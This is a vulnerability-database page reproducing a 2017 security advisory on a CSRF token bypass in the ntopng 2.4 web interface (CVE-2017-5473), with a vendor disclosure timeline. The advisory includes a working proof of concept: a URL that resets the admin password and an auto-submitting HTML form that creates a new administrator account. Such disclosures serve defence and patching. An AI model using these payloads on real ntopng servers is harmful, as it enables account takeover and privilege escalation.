Lucene search
K

ntopng Web Interface 2.4.160627 Cross Site Request Forgery Vulnerability

🗓️ 21 Jan 2017 00:00:00Reported by hyp3rlinxType 
zdt
 zdt
🔗 0day.today👁 36 Views

ntopng 2.4.160627 CSRF Token Bypass allows remote attackers to change admin password and add arbitrary user through a web interfac

Related
Code
ReporterTitlePublishedViews
Family
CNVD
ntopng Cross-Site Request Forgery Vulnerability
16 Jan 201700:00
cnvd
CVE
CVE-2017-5473
14 Jan 201706:56
cve
Cvelist
CVE-2017-5473
14 Jan 201706:56
cvelist
Debian CVE
CVE-2017-5473
14 Jan 201706:56
debiancve
Exploit DB
NTOPNG 2.4 Web Interface - Cross-Site Request Forgery
22 Jan 201700:00
exploitdb
EUVD
EUVD-2017-14577
7 Oct 202500:30
euvd
exploitpack
NTOPNG 2.4 Web Interface - Cross-Site Request Forgery
22 Jan 201700:00
exploitpack
NVD
CVE-2017-5473
14 Jan 201707:59
nvd
OSV
UBUNTU-CVE-2017-5473
14 Jan 201707:59
osv
Packet Storm
ntopng Web Interface 2.4.160627 Cross Site Request Forgery
21 Jan 201700:00
packetstorm
Rows per page
[+]#####################################################################################
[+] Credits / Discovery: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
[+] ISR: ApparitionSEC
[+]#####################################################################################



Vendor:
============
www.ntop.org


Product:
====================
ntopng Web Interface
v2.4.160627

ntopng is the next generation version of the original ntop, a network
traffic probe that shows the network usage, similar
to what the popular top Unix command does. ntopng is based on libpcap and
it has been written in a portable way in order to
virtually run on every Unix platform, MacOSX and on Windows as well.


Vulnerability Type:
==================
CSRF Token Bypass



CVE Reference:
================
CVE-2017-5473



Security Issue:
=================
By simply omitting the CSRF token or supplying arbitrary token values will
bypass CSRF protection when making HTTP requests,
to the ntopng web interface. Allowing remote attackers the rights to make
HTTP requests on an authenticated users behalf, if
the user clicks an malicious link or visits an attacker webpage etc.


Exploit/POC:
============

1) Change admin password
http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED&username=admin&new_password=xyz123&confirm_new_password=xyz123


2) Add arbitrary

<form action="
http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED"
method="GET">
<input type="hidden" name="username"  value="hyp3rlinx">
<input type="hidden" name="full_name"  value="TheApparitioN">
<input type="hidden" name="password"  value="abc123">
<input type="hidden" name="confirm_password"  value="abc123">
<input type="hidden" name="host_role"  value="administrator">
<input type="hidden" name="allowed_networks"  value="0.0.0.0/,::/">
<input type="hidden" name="allowed_interface"  value="HTTP/1.1">
<script>document.forms[0].submit()</script>
</form>



Disclosure Timeline:
=====================
Vendor Notification: January 11, 2017
Vendor acknowledgement: January 12, 2017
Vendor Fixed Issue
January 20, 2017 : Public Disclosure



Network Access:
===============
Remote


Impact:
======================
Information Disclosure
Privilege Escalation

#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation